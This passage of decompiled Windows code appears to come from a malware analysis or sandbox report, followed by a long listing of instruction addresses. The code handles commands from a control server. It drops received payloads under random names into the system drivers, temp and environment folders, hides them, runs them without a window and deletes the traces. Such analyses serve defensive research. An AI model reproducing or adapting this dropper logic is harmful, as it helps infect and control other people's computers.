														if(_t463 <= 0) {
															goto L182;
														}
														_v39 = 2;
														_t467 = E0040C65C(_t757,  &_v640,  &_v92,  *0x4136b0, _t463 * 0x24,  &_v52);
														_t811 = _t811 + 0x18;
														__eflags = _t467;
														if(_t467 <= 0) {
															break;
														}
														goto L182;
													}
													E00403A00(_t697,  *0x4136b0);
													_v39 = 3;
													_t472 = E0040C65C(_t757,  &_v640,  &_v92,  *0x4136b0, 0x28,  &_v52);
													_t811 = _t811 + 0x1c;
													__eflags = _t472;
													if(_t472 <= 0) {
														break;
													}
													goto L179;
												}
												_push(_t697);
												_push(0x100000);
												_push(_t403);
												while(1) {
													_t473 = E00403C09(_t748);
													_t811 = _t811 + 0xc;
													__eflags = _t473;
													if(_t473 == 0) {
														goto L177;
													}
													_t697 =  &_v52;
													_v39 = 4;
													_t476 = E0040C65C(_t757,  &_v640,  &_v92,  *0x4136b0, _t473,  &_v52);
													_t811 = _t811 + 0x18;
													__eflags = _t476;
													if(_t476 <= 0) {
														goto L228;
													}
													_t478 = _v24 & 0x00000010;
													__eflags = _t478;
													_push(_t478);
													_push(0x100000);
													_push( *0x4136b0);
												}
												goto L177;
											}
											__eflags = _t395 - 2;
											if(_t395 == 2) {
												_t479 = E0040DF4C(_t748,  *0x4136b0);
												__eflags = _t479;
												if(_t479 != 0) {
													E0040ED3B( &(( *0x4136b0)[4]), "work_srv", 8);
													_t483 =  *0x4136b0;
													_t811 = _t811 + 0xc;
													__eflags =  *_t483 - 1;
													if( *_t483 == 1) {
														_t485 = E0040EED1( &(_t483[4]), "work_srv");
														__eflags = _t485;
														if(_t485 == 0) {
															 *0x413680 = 0;
															 *0x413674 = 0;
															 *0x413678 = 0;
															 *0x41367c = 0;
															E0040C517();
															_v68 = 1;
														}
													}
												}
												continue;
											}
											__eflags = _t395 - 0xa;
											if(__eflags == 0) {
												E004031D0( *0x4136b0, _v52);
												L46:
												continue;
											}
											if(__eflags <= 0) {
												L156:
												_t763 = 0;
												__eflags = 0;
												do {
													_t488 =  *(_t763 + 0x413300);
													__eflags = _t488;
													if(_t488 == 0) {
														goto L165;
													}
													_t795 =  *(_t488 + 0x40);
													__eflags = _t795;
													if(_t795 == 0) {
														goto L165;
													}
													_t748 = 0;
													_t489 = _t488 + 0xc;
													__eflags = _t489;
													while(1) {
														_t705 =  *_t489;
														__eflags = _t705;
														if(_t705 == 0) {
															goto L165;
														}
														__eflags = _t705 - _v39;
														if(_t705 == _v39) {
															 *_t795(_v39,  *0x4136b0, _v52);
															_t811 = _t811 + 0xc;
															goto L165;
														}
														_t748 = _t748 + 1;
														_t489 = _t489 + 4;
														__eflags = _t748 - 0xa;
														if(_t748 < 0xa) {
															continue;
														}
														goto L165;
													}
													L165:
													_t763 = _t763 + 4;
													__eflags = _t763 - 0x80;
												} while (_t763 < 0x80);
												continue;
											}
											__eflags = _t395 - 0xc;
											if(_t395 <= 0xc) {
												_t796 =  *0x4136b0;
												_t764 = 0;
												_v60 = 0;
												_v8 = _t796;
												__eflags =  *_t796;
												if( *_t796 <= 0) {
													L57:
													_t491 = _t764;
													_t797 =  &(( *0x4136b0)[4 + _t491 * 8]);
													_t492 = _v52 + 4 + _t491 * 8;
													_t704 = _t797[0x124] + 0x128;
													_v8 = _t492;
													__eflags = _t797[0x124] + 0x128 - _t492;
													while(1) {
														_v12 = 0;
														if(__eflags > 0) {
															break;
														}
														__eflags = _v8;
														if(_v8 <= 0) {
															break;
														}
														__eflags =  *_t797 & 0x00000003;
														if(( *_t797 & 0x00000003) == 0) {
															L150:
															_t494 = _t797[0x124];
															_t704 = 0xfffffed8 - _t494;
															_v8 =  &(_v8[0xfffffffffffffed8]);
															_t797 =  &(_t797[_t494 + 0x128]);
															__eflags = _t797[0x124] + 0x128 - _v8;
															continue;
														} else {
															E0040EE2A(_t704,  &_v408, 0, 0x120);
															_t499 =  *_t797;
															_t811 = _t811 + 0xc;
															_t765 = 0;
															_t711 = 0x100;
															__eflags = _t499 & 0x00000f80;
															if((_t499 & 0x00000f80) == 0) {
																_t618 = _t499 | 0x00000100;
																__eflags = _t618;
																 *_t797 = _t618;
															}
															_t500 =  *_t797;
															__eflags = _t500 & 0x00000800;
															if((_t500 & 0x00000800) != 0) {
																_t616 = _t500 & 0xfffff7ff;
																 *_t797 = _t616;
																__eflags =  *0x41201e; // 0x0
																if(__eflags == 0) {
																	_t617 = _t616 | 0x00000200;
																	__eflags = _t617;
																} else {
																	_t617 = _t616 | _t711;
                                                                                                                                  																}
                                                                                                                                  																 *_t797 = _t617;
                                                                                                                                  															}
                                                                                                                                  															_t501 =  *_t797;
                                                                                                                                  															__eflags = _t501;
                                                                                                                                  															if(_t501 >= 0) {
                                                                                                                                  																__eflags = _t711 & _t501;
                                                                                                                                  																if((_t711 & _t501) == 0) {
                                                                                                                                  																	__eflags = _t501 & 0x00000200;
                                                                                                                                  																	if((_t501 & 0x00000200) == 0) {
                                                                                                                                  																		__eflags = _t501 & 0x00000400;
                                                                                                                                  																		if((_t501 & 0x00000400) == 0) {
                                                                                                                                  																			goto L96;
                                                                                                                                  																		}
                                                                                                                                  																		GetSystemDirectoryA( &_v408, 0x100);
                                                                                                                                  																		_t595 =  &_v408;
                                                                                                                                  																		_t775 = _t595 + 1;
                                                                                                                                  																		do {
                                                                                                                                  																			_t723 =  *_t595;
                                                                                                                                  																			_t595 = _t595 + 1;
                                                                                                                                  																			__eflags = _t723;
                                                                                                                                  																		} while (_t723 != 0);
                                                                                                                                  																		_t596 = _t595 - _t775;
                                                                                                                                  																		__eflags = _t596;
                                                                                                                                  																		if(_t596 != 0) {
                                                                                                                                  																			__eflags =  *((char*)(_t806 + _t596 - 0x195)) - 0x5c;
                                                                                                                                  																			if( *((char*)(_t806 + _t596 - 0x195)) != 0x5c) {
                                                                                                                                  																				 *((char*)(_t806 + _t596 - 0x194)) = 0x5c;
                                                                                                                                  																			}
                                                                                                                                  																		}
                                                                                                                                  																		E0040EF1E( &_v408, "drivers\\");
                                                                                                                                  																		_t776 =  &_v408;
                                                                                                                                  																		_t141 = _t776 + 1; // 0x5d
                                                                                                                                  																		_t711 = _t141;
                                                                                                                                  																		do {
                                                                                                                                  																			_t599 =  *_t776;
                                                                                                                                  																			_t776 = _t776 + 1;
                                                                                                                                  																			__eflags = _t599;
                                                                                                                                  																		} while (_t599 != 0);
                                                                                                                                  																		_t765 = _t776 - _t711;
                                                                                                                                  																		__eflags = _t765;
                                                                                                                                  																		goto L96;
                                                                                                                                  																	}
                                                                                                                                  																	GetSystemDirectoryA( &_v408, 0x100);
                                                                                                                                  																	_t777 =  &_v408;
                                                                                                                                  																	_t602 = _t777 + 1;
                                                                                                                                  																	do {
                                                                                                                                  																		_t711 =  *_t777;
                                                                                                                                  																		_t777 = _t777 + 1;
                                                                                                                                  																		__eflags = _t711;
                                                                                                                                  																	} while (_t711 != 0);
                                                                                                                                  																	_t765 = _t777 - _t602;
                                                                                                                                  																	__eflags = _t765;
                                                                                                                                  																	goto L83;
                                                                                                                                  																} else {
                                                                                                                                  																	GetEnvironmentVariableA(E00402544(0x4122f8, 0x410a3c, 0xc, 0xe4, 0xc8),  &_v408, 0x100);
                                                                                                                                  																	E0040EE2A(_t711, 0x4122f8, 0, 0x100);
                                                                                                                                  																	_t607 =  &_v408;
                                                                                                                                  																	_t811 = _t811 + 0x20;
                                                                                                                                  																	_t779 = _t607 + 1;
                                                                                                                                  																	do {
                                                                                                                                  																		_t711 =  *_t607;
                                                                                                                                  																		_t607 = _t607 + 1;
                                                                                                                                  																		__eflags = _t711;
                                                                                                                                  																	} while (_t711 != 0);
                                                                                                                                  																	_t765 = _t607 - _t779;
                                                                                                                                  																	L83:
                                                                                                                                  																	__eflags = _t765;
                                                                                                                                  																	if(_t765 == 0) {
                                                                                                                                  																		goto L96;
                                                                                                                                  																	}
                                                                                                                                  																	__eflags =  *((char*)(_t806 + _t765 - 0x195)) - 0x5c;
                                                                                                                                  																	goto L85;
                                                                                                                                  																}
                                                                                                                                  															} else {
                                                                                                                                  																_t780 =  &(_t797[4]);
                                                                                                                                  																_t609 =  &(_t797[4]);
                                                                                                                                  																_t726 =  &(_t609[1]);
                                                                                                                                  																goto L69;
                                                                                                                                  																do {
                                                                                                                                  																	L71:
                                                                                                                                  																	_t711 =  *_t613;
                                                                                                                                  																	_t613 = _t613 + 1;
                                                                                                                                  																	__eflags = _t711;
                                                                                                                                  																} while (_t711 != 0);
                                                                                                                                  																_t765 = _t613 - _t781;
                                                                                                                                  																__eflags = _t765;
                                                                                                                                  																if(_t765 == 0) {
                                                                                                                                  																	L96:
                                                                                                                                  																	__eflags =  *_t797 & 0x00000004;
                                                                                                                                  																	if(( *_t797 & 0x00000004) == 0) {
                                                                                                                                  																		_t502 =  &(_t797[0x104]);
                                                                                                                                  																		L106:
                                                                                                                                  																		_push(_t502);
                                                                                                                                  																		L107:
                                                                                                                                  																		lstrcatA( &_v408, ??);
                                                                                                                                  																		L108:
                                                                                                                                  																		__eflags =  *_t797 & 0x00000040;
                                                                                                                                  																		if(( *_t797 & 0x00000040) != 0) {
                                                                                                                                  																			E00408E26(_t711, _t748, 0x22c808, 0, 0, 0, 0,  &_v56);
                                                                                                                                  																			_t811 = _t811 + 0x18;
                                                                                                                                  																		}
                                                                                                                                  																		__eflags = _v39 - 0xc;
                                                                                                                                  																		if(_v39 == 0xc) {
                                                                                                                                  																			_t583 = E0040EE95( &_v408, ".dat");
                                                                                                                                  																			_pop(_t711);
                                                                                                                                  																			__eflags = _t583;
                                                                                                                                  																			if(_t583 != 0) {
                                                                                                                                  																				SetFileAttributesA( &_v408, 0x80);
                                                                                                                                  																			}
                                                                                                                                  																		}
                                                                                                                                  																		_t766 = CreateFileA( &_v408, 0xc0000000, 0, 0, 2, 0x80, 0);
                                                                                                                                  																		__eflags = _t766 - 0xffffffff;
                                                                                                                                  																		if(_t766 == 0xffffffff) {
                                                                                                                                  																			E0040EE2A(_t711,  &_v408, 0, 0x120);
                                                                                                                                  																			GetEnvironmentVariableA(E00402544("PromptOnSecureDesktop", 0x410a3c, 0xc, 0xe4, 0xc8),  &_v408, 0x100);
                                                                                                                                  																			E0040EE2A(_t711, "PromptOnSecureDesktop", 0, 0x100);
                                                                                                                                  																			_t513 =  &_v408;
                                                                                                                                  																			_t811 = _t811 + 0x2c;
                                                                                                                                  																			_t768 = _t513 + 1;
                                                                                                                                  																			do {
                                                                                                                                  																				_t712 =  *_t513;
                                                                                                                                  																				_t513 = _t513 + 1;
                                                                                                                                  																				__eflags = _t712;
                                                                                                                                  																			} while (_t712 != 0);
                                                                                                                                  																			_t514 = _t513 - _t768;
                                                                                                                                  																			__eflags = _t514;
                                                                                                                                  																			if(_t514 != 0) {
                                                                                                                                  																				__eflags =  *((char*)(_t806 + _t514 - 0x195)) - 0x5c;
                                                                                                                                  																				if( *((char*)(_t806 + _t514 - 0x195)) != 0x5c) {
                                                                                                                                  																					 *((char*)(_t806 + _t514 - 0x194)) = 0x5c;
                                                                                                                                  																				}
                                                                                                                                  																			}
                                                                                                                                  																			lstrcatA( &_v408,  &(_t797[0x104]));
                                                                                                                                  																			__eflags = _v39 - 0xc;
                                                                                                                                  																			if(_v39 == 0xc) {
                                                                                                                                  																				_t545 = E0040EE95( &_v408, ".dat");
                                                                                                                                  																				_pop(_t712);
                                                                                                                                  																				__eflags = _t545;
                                                                                                                                  																				if(_t545 != 0) {
                                                                                                                                  																					SetFileAttributesA( &_v408, 0x80);
                                                                                                                                  																				}
                                                                                                                                  																			}
                                                                                                                                  																			_t769 = CreateFileA( &_v408, 0xc0000000, 0, 0, 2, 0x80, 0);
                                                                                                                                  																			__eflags = _t769 - 0xffffffff;
                                                                                                                                  																			if(_t769 != 0xffffffff) {
                                                                                                                                  																				WriteFile(_t769,  &(_t797[0x128]), _t797[0x124],  &_v56, 0);
                                                                                                                                  																				CloseHandle(_t769);
                                                                                                                                  																				__eflags = _v39 - 0xc;
                                                                                                                                  																				if(_v39 == 0xc) {
                                                                                                                                  																					_t541 = E0040EE95( &_v408, ".dat");
                                                                                                                                  																					_pop(_t712);
                                                                                                                                  																					__eflags = _t541;
                                                                                                                                  																					if(_t541 != 0) {
                                                                                                                                  																						SetFileAttributesA( &_v408, 2);
                                                                                                                                  																					}
                                                                                                                                  																				}
                                                                                                                                  																				_v12 = 1;
                                                                                                                                  																			}
                                                                                                                                  																			goto L143;
                                                                                                                                  																		} else {
                                                                                                                                  																			WriteFile(_t766,  &(_t797[0x128]), _t797[0x124],  &_v56, 0);
                                                                                                                                  																			CloseHandle(_t766);
                                                                                                                                  																			__eflags = _v39 - 0xc;
                                if(_v39 == 0xc) {
                                    _t579 = E0040EE95( &_v408, ".dat");
                                    __eflags = _t579;
                                    if(_t579 != 0) {
                                        SetFileAttributesA( &_v408, 2);
                                    }
                                }
                                _v12 = 1;
                                _t552 = E0040EE95( &_v408, ".dat");
                                _pop(_t712);
                                __eflags = _t552;
                                if(_t552 == 0) {
                                    L143:
                                    __eflags =  *_t797 & 0x00000040;
                                    if(( *_t797 & 0x00000040) != 0) {
                                        E00408E26(_t712, _t748, 0x22c80c, 0, 0, 0, 0,  &_v56);
                                        _t811 = _t811 + 0x18;
                                    }
                                    __eflags =  *_t797 & 0x00000002;
                                    if(( *_t797 & 0x00000002) != 0) {
                                        __eflags = _v12;
                                        if(__eflags != 0) {
                                            E00407EAD(_t748, __eflags, 1);
                                            E00407FCF(_t712);
                                            _t770 = 0x44;
                                            E0040EE2A(_t712,  &_v876, 0, _t770);
                                            _t811 = _t811 + 0x10;
                                            _v876.cb = _t770;
                                            _t527 = CreateProcessA( &_v408, 0x410264, 0, 0, 0, 0x8000000, 0, 0,  &_v876,  &_v424);
                                            __eflags = _t527;
                                            if(_t527 == 0) {
                                                E00407EE6(_t712);
                                                E00407EAD(_t748, __eflags, 0);
                                                DeleteFileA( &_v408);
                                            } else {
                                                CloseHandle(_v424.hThread);
                                                CloseHandle(_v424);
                                            }
                                        }
                                    }
                                    goto L150;
                                } else {
                                    E0040EE2A(_t712,  &_v408, 0, 0x120);
                                    GetEnvironmentVariableA(E00402544("PromptOnSecureDesktop", 0x410a3c, 0xc, 0xe4, 0xc8),  &_v408, 0x100);
                                    E0040EE2A(_t712, "PromptOnSecureDesktop", 0, 0x100);
                                    _t559 =  &_v408;
                                    _t811 = _t811 + 0x2c;
                                    _t773 = _t559 + 1;
                                    do {
                                        _t712 =  *_t559;
                                        _t559 = _t559 + 1;
                                        __eflags = _t712;
                                    } while (_t712 != 0);
                                    _t560 = _t559 - _t773;
                                    __eflags = _t560;
                                    if(_t560 != 0) {
                                        __eflags =  *((char*)(_t806 + _t560 - 0x195)) - 0x5c;
                                        if( *((char*)(_t806 + _t560 - 0x195)) != 0x5c) {
                                            *((char*)(_t806 + _t560 - 0x194)) = 0x5c;
                                        }
                                    }
                                    lstrcatA( &_v408,  &(_t797[0x104]));
                                    __eflags = _v39 - 0xc;
                                    if(_v39 == 0xc) {
                                        _t575 = E0040EE95( &_v408, ".dat");
                                        _pop(_t712);
                                        __eflags = _t575;
                                        if(_t575 != 0) {
                                            SetFileAttributesA( &_v408, 0x80);
                                        }
                                    }
                                    _t774 = CreateFileA( &_v408, 0xc0000000, 0, 0, 2, 0x80, 0);
                                    __eflags = _t774 - 0xffffffff;
                                    if(_t774 != 0xffffffff) {
                                        WriteFile(_t774,  &(_t797[0x128]), _t797[0x124],  &_v56, 0);
                                        CloseHandle(_t774);
                                        __eflags = _v39 - 0xc;
                                        if(_v39 == 0xc) {
                                            _t571 = E0040EE95( &_v408, ".dat");
                                            _pop(_t712);
                                            __eflags = _t571;
                                            if(_t571 != 0) {
                                                SetFileAttributesA( &_v408, 2);
                                            }
                                        }
                                    }
                                    goto L143;
                                }
                            }
                        }
                        _t588 = E0040ECA5();
                        _t711 = 5;
                        _t748 = _t588 % _t711 + 3;
                        __eflags = _t748;
                        _v17 = _t748;
                        if(_t748 == 0) {
                            L99:
                            *(_t806 + _t765 - 0x194) = 0;
                            _t590 =  *_t797;
                            __eflags = _t590 & 0x0000000a;
                            if((_t590 & 0x0000000a) != 0) {
                                _t502 = E00402544("PromptOnSecureDesktop", 0x410694, 5, 0xe4, 0xc8);
                                _t811 = _t811 + 0x14;
                                goto L106;
                            }
                            __eflags = _t590 & 0x00000010;
                            if((_t590 & 0x00000010) == 0) {
                                __eflags = _t590 & 0x00000020;
                                if((_t590 & 0x00000020) == 0) {
                                    goto L108;
                                }
                                _push(".dat");
                                goto L107;
                            }
                            _push(".sys");
                            goto L107;
                        } else {
                            goto L98;
                        }
                        do {
                            L98:
                            _t591 = E0040ECA5();
                            _t711 = 0x19;
                            _t748 = _t591 % _t711 + 0x61;
                            *(_t806 + _t765 - 0x194) = _t748;
                            _t765 = _t765 + 1;
                            _t155 =  &_v17;
                            *_t155 = _v17 - 1;
                            __eflags =  *_t155;
                        } while ( *_t155 != 0);
                        goto L99;
                    }
                    _t615 =  *((intOrPtr*)(_t806 + _t765 - 0x195));
                    __eflags = _t615 - 0x5c;
                    if(_t615 != 0x5c) {
                        __eflags = _t615 - 0x2f;
                        L85:
                        if(__eflags != 0) {
                            *(_t806 + _t765 - 0x194) = 0x5c;
                            _t765 = _t765 + 1;
                        }
                    }
                    goto L96;
                    L69:
                    _t748 =  *_t609;
                    _t609 =  &(_t609[1]);
                    __eflags = _t748;
                    if(_t748 != 0) {
                        goto L69;
                    } else {
                        __eflags = _t609 - _t726;
                        E0040EE08( &_v408, _t780, _t609 - _t726);
                        _t613 =  &_v408;
                        _t811 = _t811 + 0xc;
                        _t781 = _t613 + 1;
                        goto L71;
                    }
                }
            }
        }
        __eflags =  *0x41211c & 0x00000004;
        if(( *0x41211c & 0x00000004) == 0) {
            continue;
        }
        __eflags = _v60;
        if(_v60 == 0) {
            continue;
        }
        __eflags =  *0x41201d; // 0x0
        if(__eflags == 0) {
            continue;
        }
        __imp__#3(_v16);
        Sleep(0x3e8);
        E0040E318();
        ExitProcess(0);
    } else {
        _t798 =  &(_t796[8]);
        __eflags = _t798;
        do {
            _t621 =  *(_t798 - 4);
            __eflags = _t621;
            if(_t621 == 0) {
                _v60 = 1;
                *0x412138 =  *_t798;
            } else {
                _t624 = _t621 - 1;
                __eflags = _t624;
                if(_t624 == 0) {
                    E0040EA84(1, "localcfg", "lid_file_upd",  *_t798);
                    _t811 = _t811 + 0x10;
                    *0x41213c =  *_t798;
                } else {
                    __eflags = _t624 == 1;
                    if(_t624 == 1) {
                        E0040EA84(1, "localcfg", "flags_upd",  *_t798);
                        _t811 = _t811 + 0x10;
                        *0x41211c =  *0x41211c |  *_t798;
                    }
                }
            }
            _t764 = _t764 + 1;
            _t798 =  &(_t798[2]);
            __eflags = _t764 -  *_v8;
        } while (_t764 <  *_v8);
        goto L57;
    }
}
__eflags = _t395 - 0x1b;
if(_t395 != 0x1b) {
    goto L156;
}
__eflags = _v52 - 0xc;
if(_v52 <= 0xc) {
    _t630 =  *0x4136b0;
    *0x4121a4 = _t630[4];
                                                                                                                                  												 *0x4122d4 = _t630[8];
                                                                                                                                  												_t632 = E0040F04E(0);
                                                                                                                                  												asm("adc edx, ebx");
                                                                                                                                  												 *0x4136a8 = _t632 + 0xe10;
                                                                                                                                  												 *0x4136ac = _t748;
                                                                                                                                  												continue;
                                                                                                                                  											}
                                                                                                                                  											_t634 = E00407E2F(_t748);
                                                                                                                                  											__eflags = _t634;
                                                                                                                                  											if(_t634 != 0) {
                                                                                                                                  												continue;
                                                                                                                                  											}
                                                                                                                                  											_v12 =  *0x4136b0;
                                                                                                                                  											__eflags =  *0x4121a8; // 0x0
                                                                                                                                  											if(__eflags == 0) {
                                                                                                                                  												L45:
                                                                                                                                  												_t636 = _v12;
                                                                                                                                  												 *0x4121a4 =  *(_t636 + 4);
                                                                                                                                  												 *0x4122d4 =  *(_t636 + 8);
                                                                                                                                  												E00407EAD(_t748, __eflags, 0);
                                                                                                                                  												goto L46;
                                                                                                                                  											} else {
                                                                                                                                  												GetTempPathA(0x120,  &_v408);
                                                                                                                                  												_t642 = E00408274( &_v408);
                                                                                                                                  												_pop(_t709);
                                                                                                                                  												_t782 = _t642;
                                                                                                                                  												_t801 = (E0040ECA5() & 0x00000003) + 5;
                                                                                                                                  												goto L38;
                                                                                                                                  												L38:
                                                                                                                                  												__eflags = _t801;
                                                                                                                                  												if(_t801 > 0) {
                                                                                                                                  													_t644 = E0040ECA5();
                                                                                                                                  													_t709 = 0x1a;
                                                                                                                                  													_t748 = _t644 % _t709 + 0x61;
                                                                                                                                  													 *(_t806 + _t782 - 0x194) = _t748;
                                                                                                                                  													_t782 = _t782 + 1;
                                                                                                                                  													_t801 = _t801 - 1;
                                                                                                                                  													__eflags = _t801;
                                                                                                                                  													goto L38;
                                                                                                                                  												} else {
                                                                                                                                  													E0040EF00(_t806 + _t782 - 0x194, E00402544(0x4122f8, 0x410694, 5, 0xe4, 0xc8));
                                                                                                                                  													E0040EE2A(_t709, 0x4122f8, 0, 0x100);
                                                                                                                                  													_t811 = _t811 + 0x28;
                                                                                                                                  													_t651 = CreateFileA( &_v408, 0x40000000, 0, 0, 2, 0, 0);
                                                                                                                                  													_v8 = _t651;
                                                                                                                                  													__eflags = _t651 - 0xffffffff;
                                                                                                                                  													if(__eflags != 0) {
                                                                                                                                  														_t657 = WriteFile(_v8,  &(_v12[0xc]), _v52 + 0xfffffff4,  &_v100, 0);
                                                                                                                                  														_push(_v8);
                                                                                                                                  														__eflags = _t657;
                                                                                                                                  														if(__eflags == 0) {
                                                                                                                                  															CloseHandle();
                                                                                                                                  														} else {
                                                                                                                                  															CloseHandle();
                                                                                                                                  															_push(0x4121a8);
                                                                                                                                  															_push( &_v408);
                                                                                                                                  															wsprintfA( &_v1176, E00402544(0x4122f8, 0x410fe4, 0xc, 0xe4, 0xc8));
                                                                                                                                  															E0040EE2A(_t709, 0x4122f8, 0, 0x100);
                                                                                                                                  															_t803 = 0x44;
                                                                                                                                  															E0040EE2A(_t709,  &_v808, 0, 0x4122f8);
                                                                                                                                  															_v808.cb = _t803;
                                                                                                                                  															E0040EE2A(_t709,  &_v120, 0, 0x10);
                                                                                                                                  															_t811 = _t811 + 0x48;
                                                                                                                                  															E00407FCF(_t709);
                                                                                                                                  															_t673 = CreateProcessA(0,  &_v1176, 0, 0, 0, 0x8000000, 0, 0,  &_v808,  &_v120);
                                                                                                                                  															__eflags = _t673;
                                                                                                                                  															if(_t673 != 0) {
                                                                                                                                  																WaitForSingleObject(_v120.hProcess, 0xea60);
                                                                                                                                  																CloseHandle(_v120.hThread);
                                                                                                                                  																CloseHandle(_v120);
                                                                                                                                  																_t681 = E0040F04E(0) + 0xe10;
                                                                                                                                  																__eflags = _t681;
                                                                                                                                  																asm("adc edx, ebx");
                                                                                                                                  																_pop(_t709);
                                                                                                                                  																 *0x4136a8 = _t681;
                                                                                                                                  																 *0x4136ac = _t748;
                                                                                                                                  															}
                                                                                                                                  															E00407EE6(_t709);
                                                                                                                                  															DeleteFileA( &_v408);
                                                                                                                                  														}
                                                                                                                                  													}
                                                                                                                                  													goto L45;
                                                                                                                                  												}
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  										L228:
                                                                                                                                  										__imp__#3(_v16);
                                                                                                                                  										E0040E318();
                                                                                                                                  										return _v68;
                                                                                                                                  									} else {
                                                                                                                                  										__imp__#3(_v16);
                                                                                                                                  										goto L21;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  								L15:
                                                                                                                                  								__imp__#3(_v16);
                                                                                                                                  							}
                                                                                                                                  							return E0040C8AA(_t829);
                                                                                                                                  						} else {
                                                                                                                                  							_t805 =  *0x413670;
                                                                                                                                  							while(_v12 < _t805) {
                                                                                                                                  								asm("cdq");
                                                                                                                                  								_t747 = (_t747 + 1) % _t805;
                                                                                                                                  								 *0x41367c =  *0x41367c + 1;
                                                                                                                                  								_v12 =  &(_v12[1]);
                                                                                                                                  								 *0x413674 = _t747;
                                                                                                                                  								if( *((intOrPtr*)(_t747 * 0x45 + _t688 + 0x41)) == 0) {
                                                                                                                                  									continue;
                                                                                                                                  								}
                                                                                                                                  								goto L11;
                                                                                                                                  							}
                                                                                                                                  							goto L11;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					_t686 = E0040EBCC(0x100000);
                                                                                                                                  					 *0x4136b0 = _t686;
                                                                                                                                  					if(_t686 == 0) {
                                                                                                                                  						goto L21;
                                                                                                                                  					}
                                                                                                                                  					goto L7;
                                                                                                                                  				}
                                                                                                                                  			}
                                                                                                                                  0x0040cbb8
                                                                                                                                  0x0040daea
                                                                                                                                  0x0040daea
                                                                                                                                  0x0040daeb
                                                                                                                                  0x0040daf0
                                                                                                                                  0x0040daf2
                                                                                                                                  0x0040daf5
                                                                                                                                  0x0040daf7
                                                                                                                                  0x0040dafd
                                                                                                                                  0x0040daff
                                                                                                                                  0x0040db02
                                                                                                                                  0x0040db0b
                                                                                                                                  0x0040db1b
                                                                                                                                  0x0040db20
                                                                                                                                  0x0040db20
                                                                                                                                  0x0040db02
                                                                                                                                  0x0040dafd
                                                                                                                                  0x0040db23
                                                                                                                                  0x0040db24
                                                                                                                                  0x0040db24
                                                                                                                                  0x00000000
                                                                                                                                  0x0040db29
                                                                                                                                  0x0040cbbe
                                                                                                                                  0x0040cbc1
                                                                                                                                  0x0040d662
                                                                                                                                  0x0040d667
                                                                                                                                  0x0040d669
                                                                                                                                  0x0040d66c
                                                                                                                                  0x0040d66f
                                                                                                                                  0x0040d672
                                                                                                                                  0x0040d675
                                                                                                                                  0x0040d6c7
                                                                                                                                  0x0040d6c7
                                                                                                                                  0x0040d6cb
                                                                                                                                  0x0040d707
                                                                                                                                  0x0040d707
                                                                                                                                  0x0040d70b
                                                                                                                                  0x0040d754
                                                                                                                                  0x0040d754
                                                                                                                                  0x0040d758
                                                                                                                                  0x0040d79e
                                                                                                                                  0x0040d79e
                                                                                                                                  0x0040d7a2
                                                                                                                                  0x0040d8b3
                                                                                                                                  0x0040d8b3
                                                                                                                                  0x0040d8ba
                                                                                                                                  0x0040d93a
                                                                                                                                  0x0040d93a
                                                                                                                                  0x0040d941
                                                                                                                                  0x0040da0e
                                                                                                                                  0x0040da0e
                                                                                                                                  0x0040da11
                                                                                                                                  0x0040da11
                                                                                                                                  0x0040da14
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040da1d
                                                                                                                                  0x0040da23
                                                                                                                                  0x0040da25
                                                                                                                                  0x0040da90
                                                                                                                                  0x0040da90
                                                                                                                                  0x0040da94
                                                                                                                                  0x0040da9b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040daa1
                                                                                                                                  0x0040daa4
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040dabf
                                                                                                                                  0x0040dac2
                                                                                                                                  0x0040dac7
                                                                                                                                  0x0040daca
                                                                                                                                  0x0040dacc
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040dacc
                                                                                                                                  0x0040da27
                                                                                                                                  0x0040da2a
                                                                                                                                  0x0040da2c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040da42
                                                                                                                                  0x0040da7d
                                                                                                                                  0x0040da7d
                                                                                                                                  0x0040da80
                                                                                                                                  0x0040da83
                                                                                                                                  0x0040da85
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040da5f
                                                                                                                                  0x0040da64
                                                                                                                                  0x0040da67
                                                                                                                                  0x0040da69
                                                                                                                                  0x0040da89
                                                                                                                                  0x00000000
                                                                                                                                  0x0040da89
                                                                                                                                  0x0040da7a
                                                                                                                                  0x0040da7a
                                                                                                                                  0x00000000
                                                                                                                                  0x0040da87
                                                                                                                                  0x00000000
                                                                                                                                  0x0040da11
                                                                                                                                  0x0040d947
                                                                                                                                  0x0040d94c
                                                                                                                                  0x0040d94e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d955
                                                                                                                                  0x0040d95b
                                                                                                                                  0x0040d961
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d967
                                                                                                                                  0x0040d975
                                                                                                                                  0x0040d975
                                                                                                                                  0x0040d97b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d981
                                                                                                                                  0x0040d987
                                                                                                                                  0x0040d9c9
                                                                                                                                  0x0040d9c9
                                                                                                                                  0x0040d9ce
                                                                                                                                  0x0040d9d0
                                                                                                                                  0x0040d9d6
                                                                                                                                  0x0040d9d9
                                                                                                                                  0x0040d9df
                                                                                                                                  0x0040d9f7
                                                                                                                                  0x0040d9fe
                                                                                                                                  0x0040da03
                                                                                                                                  0x0040da06
                                                                                                                                  0x0040da08
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040da08
                                                                                                                                  0x0040d998
                                                                                                                                  0x0040d99a
                                                                                                                                  0x0040d99d
                                                                                                                                  0x0040d99f
                                                                                                                                  0x0040d9ab
                                                                                                                                  0x0040d9b4
                                                                                                                                  0x0040d9b9
                                                                                                                                  0x0040d9be
                                                                                                                                  0x0040d9be
                                                                                                                                  0x0040d9c1
                                                                                                                                  0x0040d9c7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d9c7
                                                                                                                                  0x0040d969
                                                                                                                                  0x0040d96f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
